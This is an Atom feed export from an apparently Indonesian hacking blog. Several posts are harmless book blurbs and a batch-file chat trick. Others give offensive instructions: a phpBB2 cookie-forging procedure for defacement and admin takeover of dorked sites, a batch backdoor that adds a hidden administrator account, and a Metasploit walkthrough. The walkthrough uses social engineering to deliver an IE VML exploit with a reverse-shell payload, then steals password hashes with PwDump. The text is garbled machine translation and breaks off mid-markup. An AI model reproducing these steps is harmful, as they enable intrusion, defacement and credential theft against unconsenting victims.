href='http://my-hacking.blogspot.com/2009/08/oracle-dba-pocket-guide.html' title='Oracle DBA Pocket Guide'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-8359594752137505087</id><published>2009-08-09T00:57:00.000-07:00</published><updated>2009-10-08T05:40:03.433-07:00</updated><title type='text'>Oracle PL/SQL for DBAs</title><content type='html'>Description&lt;br /&gt;&lt;br /&gt;PL/SQL, Oracle's powerful procedural language, has been the cornerstone of Oracle application development for nearly 15 years. Although primarily a tool for developers, PL/SQL has also become an essential tool for database administration. DBAs who have not yet discovered how helpful PL/SQL can be will find this book a superb introduction to the language and its special database administration features. Even if you have used PL/SQL for years, you'll find the detailed coverage in this book to be an invaluable resource.&lt;br /&gt;Full Description&lt;br /&gt;PL/SQL, Oracle's powerful procedural language, has &lt;span class="fullpost"&gt;been the cornerstone of Oracle application development for nearly 15 years. Although primarily a tool for developers, PL/SQL has also become an essential tool for database administration, as DBAs take increasing responsibility for site performance and as the lines between developers and DBAs blur.&lt;br /&gt;&lt;br /&gt;Until now, there has not been a book focused squarely on the language topics of special concern to DBAs Oracle PL/SQL for DBAs fills the gap. Covering the latest Oracle version, Oracle Database 10g Release 2 and packed with code and usage examples, it contains:&lt;br /&gt;&lt;br /&gt;    * A quick tour of the PL/SQL language, providing enough basic information about language fundamentals to get DBAs up and running&lt;br /&gt;    * Extensive coverage of security topics for DBAs: Encryption (including both traditional methods and Oracle's new Transparent Data Encryption, TDE); Row-Level Security (RLS), Fine-Grained Auditing (FGA); and random value generation&lt;br /&gt;    * Methods for DBAs to improve query and database performance with cursors and table functions&lt;br /&gt;    * Coverage of Oracle scheduling, which allows jobs such as database monitoring and statistics gathering to be scheduled for regular execution&lt;br /&gt;&lt;br /&gt;Using Oracle's built-in packages (DBMS_CRYPTO, DBMS_RLS, DBMS_FGA, DBMS_RANDOM, DBMS_SCHEDULING) as a base, the book describes ways of building on top of these packages to suit particular organizational needs. Authors are Arup Nanda, Oracle Magazine 2003 DBA of the Year, and Steven Feuerstein, the world's foremost PL/SQL expert and coauthor of the classic reference, Oracle PL/SQL Programming.&lt;br /&gt;&lt;br /&gt;DBAs who have not yet discovered how helpful PL/SQL can be will find this book a superb introduction to the language and its special database administration features. Even if you have used PL/SQL for years, you'll find the detailed coverage in this book to be an invaluable resource.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-8359594752137505087?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://oreilly.com/catalog/9780596005870/#top' title='Oracle PL/SQL for DBAs'/><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/8359594752137505087/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/08/oracle-plsql-for-dbas.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/8359594752137505087'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/8359594752137505087'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/08/oracle-plsql-for-dbas.html' title='Oracle PL/SQL for DBAs'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-7393231871754673655</id><published>2009-08-09T00:56:00.001-07:00</published><updated>2009-10-08T05:39:46.902-07:00</updated><title type='text'>Simply SQL</title><content type='html'>Description&lt;br /&gt;Simply SQL is a practical step-by-step guide to writing SQL. You'll learn how to make the most of your data using best-practice SQL code. Rather than bore you with theory, it focuses on the practical use of SQL with common databases and uses plenty of diagrams, easy-to-read text, and examples to help make learning SQL easy and fun. Full Description&lt;br /&gt;Packed with examples, Simply SQL is a step-by-step introduction to learning SQL. You'll discover how easy it is to use SQL to &lt;span class="fullpost"&gt;interact with best-practice, robust databases. Rather than bore you with theory, it focuses on the practical use of SQL with common databases and uses plenty of diagrams, easy-to-read text, and examples to help make learning SQL easy and fun.&lt;br /&gt;&lt;br /&gt;    * Step through the basic SQL syntax&lt;br /&gt;    * Learn how to use best practices in database design&lt;br /&gt;    * Master advanced syntax like inner joins, groups, and subqueries&lt;br /&gt;    * Understand the SQL datatypes&lt;br /&gt;    * And much more...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-7393231871754673655?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://oreilly.com/catalog/9780980455250/' title='Simply SQL'/><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/7393231871754673655/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/08/simply-sql.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7393231871754673655'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7393231871754673655'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/08/simply-sql.html' title='Simply SQL'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-3301423900995388002</id><published>2009-08-09T00:52:00.000-07:00</published><updated>2009-10-08T05:39:35.371-07:00</updated><title type='text'>Backup &amp; Recovery</title><content type='html'>Description&lt;br /&gt;&lt;br /&gt;Packed with practical, freely available backup and recovery solutions for Unix, Linux, Windows, and Mac OS X systems -- as well as various databases -- this new guide is a complete overhaul of Unix Backup &amp; Recovery by the same author, now revised and expanded with over 75% new material.&lt;br /&gt;Full Description&lt;br /&gt;Packed with practical, freely available backup and &lt;span class="fullpost"&gt;recovery solutions for Unix, Linux, Windows, and Mac OS X systems -- as well as various databases -- this new guide is a complete overhaul of Unix Backup &amp; Recovery by the same author, now revised and expanded with over 75% new material.&lt;br /&gt;&lt;br /&gt;Backup &amp; Recovery starts with a complete overview of backup philosophy and design, including the basic backup utilities of tar, dump, cpio, ntbackup, ditto, and rsync. It then explains several open source backup products that automate backups using those utilities, including AMANDA, Bacula, BackupPC, rdiff-backup, and rsnapshot. Backup &amp; Recovery then explains how to perform bare metal recovery of AIX, HP-UX, Linux, Mac OS, Solaris, VMWare, &amp; Windows systems using freely-available utilities. The book also provides overviews of the current state of the commercial backup software and hardware market, including overviews of CDP, Data De-duplication, D2D2T, and VTL technology. Finally, it covers how to automate the backups of DB2, Exchange, MySQL, Oracle, PostgreSQL, SQL-Server, and Sybase databases - without purchasing a commercial backup product to do so.&lt;br /&gt;&lt;br /&gt;For environments of all sizes and budgets, this unique book shows you how to ensure data protection without resorting to expensive commercial solutions. You will soon learn to:&lt;br /&gt;&lt;br /&gt;    * Automate the backup of popular databases without a commercial utility&lt;br /&gt;    * Perform bare metal recovery of any popular open systems platform, including your PC or laptop&lt;br /&gt;    * Utilize valuable but often unknown open source backup products&lt;br /&gt;    * Understand the state of commercial backup software, including explanations of CDP and data de-duplication software&lt;br /&gt;    * Access the current state of backup hardware, including Virtual Tape Libraries (VTLs)&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-3301423900995388002?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://oreilly.com/catalog/9780596102463/#top' title='Backup &amp; Recovery'/><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/3301423900995388002/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/08/backup-recovery.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/3301423900995388002'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/3301423900995388002'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/08/backup-recovery.html' title='Backup &amp; Recovery'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-3044922577135562284</id><published>2009-08-09T00:49:00.000-07:00</published><updated>2009-10-08T05:39:12.106-07:00</updated><title type='text'>Password Hacking: Programs and Tools Make it Easy</title><content type='html'>Dictionary attacks are another technique among password hacking programs. It is more sophisticated than a brute force attack but not as complex as a hash function password program. Although it could be considered similar to a brute force attack, the main difference between these two is that a dictionary attack uses determined words,&lt;br /&gt;hoping that the creator of the password used words that can be found in any dictionary. It may sound a bit foolish but reality has shown that people are not very careful with their passwords.&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;br /&gt;What Are the Tools Available For Password Hacking&lt;/span&gt;&lt;br /&gt;There are many password hack tools available in the internet. Some of them are free, others are available for a small fee. For example, there is Rainbowcrack. This tool was created for cracking hash passwords through brute force; it may not &lt;span class="fullpost"&gt;be very sophisticated, but it does the job.&lt;br /&gt;&lt;br /&gt;Another example is LC5 (formerly known as L0phtCrack). It recovers Microsoft Windows passwords using dictionaries, brute force or a combination of both. Unfortunately, it won't be available after 2006 since Symantec acquired it.&lt;br /&gt;&lt;br /&gt;Rate this Article&lt;br /&gt;  Excellent&lt;br /&gt;&lt;br /&gt;  Good&lt;br /&gt;&lt;br /&gt;  Average&lt;br /&gt;&lt;br /&gt;  Bad&lt;br /&gt;&lt;br /&gt;  Terrible&lt;br /&gt;&lt;br /&gt;rate&lt;br /&gt;&lt;br /&gt;Current Rating&lt;br /&gt;John the Ripper is another password cracking tool, and can run in a series of platforms. Considered one of the most popular password hacking programs, it combines different cracker programs into one package. It uses the dictionary attack for searching hash passwords and also has a brute force mode.&lt;br /&gt;&lt;br /&gt;Another Windows recovery tool is Cain and Abel. This software package uses a series of tools for password recovery, like dictionary, brute force and cryptanalysis attacks (that means that it looks for a key for accessing the password, something like the password's password).&lt;br /&gt;&lt;br /&gt;Rixler Software is a company who offers a service of password cracking for different kind of programs, like Word, Excel, Access, VBA, Outlook Express and Internet Explorer. They offer personal and business licenses, depending on your needs.&lt;br /&gt;&lt;br /&gt;Brutus is considered by its creator one of the fastest and more flexible password crackers in the market. The good thing about this tool is that it is a free password hacker. The bad thing is that it is only available for Windows 9x, NT and 2000.&lt;br /&gt;&lt;br /&gt;Password hacking, passwords hackers, password protection, it doesn't matter which of those concepts are wandering through your head. If you want to be able to hack passwords, let's say, for some client who forgot his recently changed password, then you will have to practice a bit and maintain yourself updated on the latest trend of password hacking programs.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-3044922577135562284?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.hackingalert.com/hacking-articles/password-hacking-programs.php' title='Password Hacking: Programs and Tools Make it Easy'/><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/3044922577135562284/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/08/password-hacking-programs-and-tools.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/3044922577135562284'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/3044922577135562284'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/08/password-hacking-programs-and-tools.html' title='Password Hacking: Programs and Tools Make it Easy'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-7817768481618877458</id><published>2009-08-09T00:46:00.000-07:00</published><updated>2009-10-08T05:38:58.877-07:00</updated><title type='text'>Chat With Command Prompt</title><content type='html'>If you want a private chat with a friend or client on you Network, you don't need to download any fancy program!&lt;br /&gt;All you need is your friends IP address and Command Prompt.&lt;br /&gt;&lt;br /&gt;Firstly, open Notepad and enter:&lt;br /&gt;&lt;br /&gt;@echo off&lt;br /&gt;:A &lt;br /&gt;Cls&lt;br /&gt;echo MESSENGER &lt;br /&gt;set /p n=User: &lt;br /&gt;set /p m=Message: &lt;br /&gt;net send %n% %m% &lt;br /&gt;Pause&lt;br /&gt;Goto A &lt;br /&gt;&lt;br /&gt;Now save this as "Messenger.bat". Open the &lt;span class="fullpost"&gt;.bat file and in Command Prompt you should see:&lt;br /&gt;&lt;br /&gt;MESSENGER&lt;br /&gt;User:&lt;br /&gt;&lt;br /&gt;After "User" type the IP address of the computer you want to contact.&lt;br /&gt;After this, you should see this:&lt;br /&gt;&lt;br /&gt;Message:&lt;br /&gt;&lt;br /&gt;Now type in the message you wish to send.&lt;br /&gt;Before you press "Enter" it should look like this:&lt;br /&gt;&lt;br /&gt;MESSENGER&lt;br /&gt;User: 56.108.104.107&lt;br /&gt;Message: Hi&lt;br /&gt;&lt;br /&gt;Now all you need to do is press "Enter", and start chatting!&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-7817768481618877458?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.oreillynet.com/pub/h/3110' title='Chat With Command Prompt'/><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/7817768481618877458/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/08/chat-with-command-prompt.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7817768481618877458'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7817768481618877458'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/08/chat-with-command-prompt.html' title='Chat With Command Prompt'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-1682828949796268896</id><published>2009-08-08T07:30:00.000-07:00</published><updated>2009-10-08T05:38:44.572-07:00</updated><title type='text'>Learn how HACKING</title><content type='html'>following are some tricks for the info n HACKING survivors try ya bro?&lt;br /&gt;&lt;br /&gt;that all do not try to hurt other people.&lt;br /&gt;cuma for this we learn how Hacked busy now in the era of globalization&lt;br /&gt;&lt;br /&gt;Time to learn from here that for our country INDONESIA willingly die for&lt;span class="fullpost"&gt; the sake of love&lt;br /&gt;&lt;br /&gt;Defacing&lt;br /&gt;Steps Deface PHPBB/PHPBB2 Loser_cs_20&lt;br /&gt;&lt;br /&gt;1. Download Mozilla FireFox browser&lt;br /&gt;&lt;br /&gt;2. Download pluginnya I called LiveHTTPHeader&lt;br /&gt;download at hxxp: / / livehttpheaders.mozdev.org / installation.html&lt;br /&gt;is a new search&lt;br /&gt;&lt;br /&gt;3. target with the next search with Google Uncle syntax:&lt;br /&gt;phpBB site: [What's up aja]&lt;br /&gt;&lt;br /&gt;4. after that we open the plugin you downloaded earlier in the Tools -&gt; LiveHTTPHeader&lt;br /&gt;&lt;br /&gt;5. Remember, the content must be empty LiveHTTPHeader&lt;br /&gt;&lt;br /&gt;6. open the target site, so LiveHTTPHeader will take all the cookies you recorded in the target page&lt;br /&gt;&lt;br /&gt;7. after a successful open page marked with a "done" at the bottom of the browser, the next step is clicking LiveHTTPHeader resumed in the middle click option Replay ..&lt;br /&gt;&lt;br /&gt;8. after open LiveHTTPReplay liat under this section as the LiveHTTPReplay ...&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;Cookies: phpbb2mysql_data = a% 3A0% 3A% 7b% 7D; phpbb2mysql_sid = 88da2bbdc1a3a789df094d50d91f7e3b&lt;br /&gt;9. Remove the part and sign the back after the semi colon (&lt;br /&gt;&lt;br /&gt;Cookies: phpbb2mysql_data = a% 3A0% 3A% 7b% 7D; phpbb2mysql_sid = 88da2bbdc1a3a789df094d50d91f7e3b&lt;br /&gt;\ _______________remove this part _________________ /&lt;br /&gt;&lt;br /&gt;akan happens like this:&lt;br /&gt;&lt;br /&gt;Cookies: phpbb2mysql_data = a% 3A0% 3A% 7b% 7D&lt;br /&gt;&lt;br /&gt;10. and click on the replay again, so that the target page will reload all the cookies you have been our manipulation&lt;br /&gt;&lt;br /&gt;11. note the next steps below:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;Cookies: phpbb2mysql_data = a% 3A0% 3A% 7b% 7D&lt;br /&gt;\ ________remove in this section and replace with:&lt;br /&gt;&lt;br /&gt;Cookies: phpbb2mysql_data = a: 2 (s: 11: "auto loginid"; s: 32: "602b aahpepms74d4cb6f2d012e1e4019"; s: 6: "user id"; s: 1: "2";)&lt;br /&gt;12. and click on the replay again, so that the target page will reload all the cookies you have been manipulating us earlier.&lt;br /&gt;&lt;br /&gt;13. note this step again:&lt;br /&gt;&lt;br /&gt;Quote:&lt;br /&gt;Cookies: phpbb2mysql_data = a: 2: (s: 11: "auto loginid"; s: 32: "602 baahpepms74d4cb6f2d012e1e4019"; s: 6: "user id"; s: 1: "2";)&lt;br /&gt;\ ____________________This part is replaced again________________________ jg /&lt;br /&gt;be like this:&lt;br /&gt;&lt;br /&gt;Cookies: phpbb2mysql_data = a% 3A2% 3A% 7Bs% 3A11% 3A% 22autologini d% 22% 3Bb% 3A1% 3Bs% 3A6% 3A% 22userid% 22% 3Bs% 3A1% 3A% 222% 22% 3B% 7D&lt;br /&gt;&lt;br /&gt;14. and click on the replay again, so that the target page akan mereload all the cookies you have been manipulating us earlier.&lt;br /&gt;&lt;br /&gt;15. finished ... please liat the target page, you are lucky you you get full admin.&lt;br /&gt;&lt;br /&gt;Please go to the bottom of the page and see the option "Go To Administration Panel" has been shown&lt;br /&gt;&lt;br /&gt;Echo Backdoor:&lt;br /&gt;rem * echobackd00r.bat&lt;br /&gt;rem * March 2004 - backd00r for XP &amp; 2000 &amp;&lt;br /&gt;brakes * made to facilitate creating an admin account&lt;br /&gt;* Combine with the brake SPLOITS to get the admin account ex: kaht2&lt;br /&gt;or brake * into a pc with the floppy disks are still the default: P read eksploits local&lt;br /&gt;&lt;br /&gt;* FROM brake.&lt;br /&gt;&lt;br /&gt;@ echo off&lt;br /&gt;Prompt $ P $ G&lt;br /&gt;cls&lt;br /&gt;Color 87&lt;br /&gt;Goto ad&lt;br /&gt;&lt;br /&gt;: setting&lt;br /&gt;&lt;br /&gt;replace the brake * USER and PASS&lt;br /&gt;&lt;br /&gt;set USER = "backdoor"&lt;br /&gt;set PASS = "password"&lt;br /&gt;&lt;br /&gt;if% USER% == "backdoor" Goto Goto else failed process&lt;br /&gt;&lt;br /&gt;: Process&lt;br /&gt;&lt;br /&gt;brake * into the tuk nambahin user + password&lt;br /&gt;&lt;br /&gt;net user% USER%% PASS% / add&lt;br /&gt;net local group Administrators% USER% / add&lt;br /&gt;net local group Users% USER% / delete&lt;br /&gt;&lt;br /&gt;cls&lt;br /&gt;echo.&lt;br /&gt;Account echo% USER%% PASS with password% has been successfully created!&lt;br /&gt;color 70&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;EXIT&lt;br /&gt;&lt;br /&gt;: ad&lt;br /&gt;&lt;br /&gt;rem * a banner from me, can be removed&lt;br /&gt;&lt;br /&gt;echo.&lt;br /&gt;echo ################################################&lt;br /&gt;echo # #&lt;br /&gt;echo # # Echobackd00r&lt;br /&gt;# echo created by &amp; &amp; tested with XP OS y3dips #&lt;br /&gt;echo # greetz to: the_day for idea, Moby, z3r0byt3, comex, Puji * #&lt;br /&gt;echo # note: change the USER and PASS #&lt;br /&gt;echo # #&lt;br /&gt;echo ################################################# # #&lt;br /&gt;echo.&lt;br /&gt;echo press ENTER!&lt;br /&gt;pause&gt; nul&lt;br /&gt;&lt;br /&gt;Goto settings&lt;br /&gt;&lt;br /&gt;: failed&lt;br /&gt;&lt;br /&gt;echo.&lt;br /&gt;echo echobackd00r.bat edit the file and change the USER and PASSnya&lt;br /&gt;echo.&lt;br /&gt;&lt;br /&gt;rem * Done.&lt;br /&gt; &lt;br /&gt;Continued ...........&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-1682828949796268896?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/1682828949796268896/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/08/learn-how-hacking.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/1682828949796268896'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/1682828949796268896'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/08/learn-how-hacking.html' title='Learn how HACKING'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-2504651648084510132</id><published>2009-08-08T06:59:00.000-07:00</published><updated>2009-10-08T05:38:25.694-07:00</updated><title type='text'>Study Hack Yuck! (3) - Hack Windows XP SP2</title><content type='html'>After knowing a few basic concepts and the 'standard' about the hack that first discussed the material and know little about the exploit in the second section, we now directly aja practice. Here I deliberately use VMWare to do the simulation, because not all people can mempraktekannya in a network. By using VMWare, we can simulate a simple network that seems to have a network consisting of our own computer and other computers. For those who can not use &lt;span class="fullpost"&gt;VMWare, try searching diinternet! Operating System that I use is Windows XP SP2.&lt;br /&gt;&lt;br /&gt;Tools that I use is to do the Metasploit Framework exploit and to take PwDump6 hash file from the target computer. What is the Metasploit Framework?&lt;br /&gt;&lt;br /&gt;     The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, research, and Vulnerability.&lt;br /&gt;&lt;br /&gt;For more information about the use of Metasploit, you can read dokomentasi also included in the installation. To install metasploit version 2.7, users needed administrator. I try to install with a 'limited user', but once installed can not run. Actual installation metasploit just unpack this file only. So you can install without having to get the admin user and put it anywhere without having to install in the Program Files folder. However, after a little dioprek, apparently does not need the admin can run. Ribet slightly and Reviews males do here, soalnya when trying the latest version, the version 3 Beta 3, we can run it without having to install the admin user. Gitu aja ko busy! Moreover version 3 (skarang msh beta) feature more cool and more. But unfortunately for msfweb (version webnya) has not been able to run fully.&lt;br /&gt;&lt;br /&gt;Ok .. now I assume you have read the userguide metasploit (ah.. I most incorrect assumption; p). Let cool and more plasticity to understand the details, I explain metasplooit using the console (mfsconsole) only. Metasploit using cygwin to run it, because it made use metasploit Perl. Now let us praktekkan!&lt;br /&gt;&lt;br /&gt;first run 'mfsconsole'!&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sn2FNW93rGI/AAAAAAAAAMM/Cp3l1aewPBU/s1600-h/main1.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 281px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sn2FNW93rGI/AAAAAAAAAMM/Cp3l1aewPBU/s320/main1.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5367592795445374050" /&gt;&lt;/a&gt;&lt;br /&gt;Command to learn what is in the MSFConsole use the command 'help'.&lt;br /&gt;&lt;br /&gt;Because the computer that you want to be a target is Windows XP SP2, then use the exploit affecting XP SP2 is to exploit weaknesses in Internet Explorer VML Fill Method Code Execution.&lt;br /&gt;&lt;br /&gt;     This module exploits a code execution Vulnerability in Microsoft Internet Explorer using a buffer overflow in the processing VML code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.&lt;br /&gt;&lt;br /&gt;To view the info from this exploit use the command:&lt;br /&gt;&lt;br /&gt;     MSF&gt; ie_vml_rectfill info&lt;br /&gt;&lt;br /&gt;Exploit ie_vml_rectfill exploit weaknesses in Internet Explorer. Therefore, this exploit will have an impact if the target machine to run IE and direct url to the computer to its attacker. For that, we must use a little 'social engineering', as if in kost / lab / office to us is our friends that we are trying to make the latest web application, and have seen how to use IE to an IP address (or computer name) us. Suppose http://192.168.186.1. Usually after this exploit is executed and the target computer has been connected, then IE will crash. Leave some time to exploit the 'work'. After some time aja bilang "wah .. I have error. Ok deh .. betulin my first try ... makasih ya. " New IE close its a Task Manager (even if a CE, IE in msh hard-kill, not to forget me-'end process'-kan 'dumpred.exe' also, but after the exploit work:-D).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;To exploit the use perintah2 following in console:&lt;br /&gt;&lt;br /&gt;     MSF&gt; use_ie_vml_rectfill&lt;br /&gt;&lt;br /&gt;     MSF&gt; set payload win32_reverse&lt;br /&gt;&lt;br /&gt;     MSF&gt; set RHOST ip_target&lt;br /&gt;&lt;br /&gt;     MSF&gt; set LHOST ip_attacker&lt;br /&gt;&lt;br /&gt;     MSF&gt; exploit&lt;br /&gt;&lt;br /&gt;The result will look like the image below:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sn2Gs1cxMHI/AAAAAAAAAMc/9Yxd5skE-T8/s1600-h/t.gif"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 1px; height: 1px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sn2Gs1cxMHI/AAAAAAAAAMc/9Yxd5skE-T8/s320/t.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5367594435715608690" /&gt;&lt;/a&gt;&lt;br /&gt;In the example above, the target computer's IP (RHOST) is 192168186128, whereas the computer attacker (LHOST) is 192.168.186.1. And the 'payload' is used 'win32_reverse' PORT and HTTP is 80 (default http port). After running the command 'exploit', we have a new target machine to run IE and its direct url to our computer. This process will take some time, even sometimes not successful. So try and hold aja:-D&lt;br /&gt;&lt;br /&gt;If you are successful, then you will get the 'cmd.exe' from the target computer.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Crack Password!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Well, after we 'control' the target computer, skalian aja password we see it. How similar to my previous article about Win XP SP2 Hack Password, but because it is remote, we must 'provide' program that is required PwDump. To be successful this way, I assume on the target computer users who are logged in have access to admin. I used a computer user who used the target is only IE user 'normal', pwdump will not succeed!&lt;br /&gt;&lt;br /&gt;First we used to share PwDump from our computer with full access so that we can upload the dump target computer password, but ending with '$' though not visible public computer. Suppose the name of the folder in the share PwDump $. Then from the console that was successful dihack, take PwDump with the Map Network Drive from the computer with our 'net use'. Examples of commands used&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sn2HT_4FaHI/AAAAAAAAAMk/j1YhPxKl2Ts/s1600-h/pwdump.JPG"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 218px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/Sn2HT_4FaHI/AAAAAAAAAMk/j1YhPxKl2Ts/s320/pwdump.JPG" border="0" alt=""id="BLOGGER_PHOTO_ID_5367595108529432690" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 